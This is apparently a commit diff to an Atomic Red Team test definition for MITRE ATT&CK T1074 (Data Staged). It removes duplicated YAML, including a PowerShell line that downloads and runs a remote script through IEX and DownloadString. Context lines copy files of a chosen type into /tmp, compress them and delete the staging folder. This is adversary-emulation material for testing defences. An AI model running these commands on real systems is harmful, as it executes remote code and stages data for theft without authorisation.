T1074/collect-n-compress-file-types: Fixed yaml errors in T1074
This commit is contained in:
@@ -2,15 +2,6 @@
|
||||
attack_technique: T1074
|
||||
display_name: Data Staged
|
||||
|
||||
atomic_tests:
|
||||
- name: Stage data from Discovery.bat
|
||||
description: |
|
||||
Utilize powershell to download discovery.bat and save to a local file
|
||||
|
||||
supported_platforms:---
|
||||
attack_technique: T1074
|
||||
display_name: Data Staged
|
||||
|
||||
atomic_tests:
|
||||
- name: Stage data from Discovery.bat
|
||||
description: |
|
||||
@@ -104,10 +95,3 @@ atomic_tests:
|
||||
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
|
||||
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
|
||||
rm -rf /tmp/staging
|
||||
|
||||
- windows
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
|
||||
|
||||
Reference in New Issue
Block a user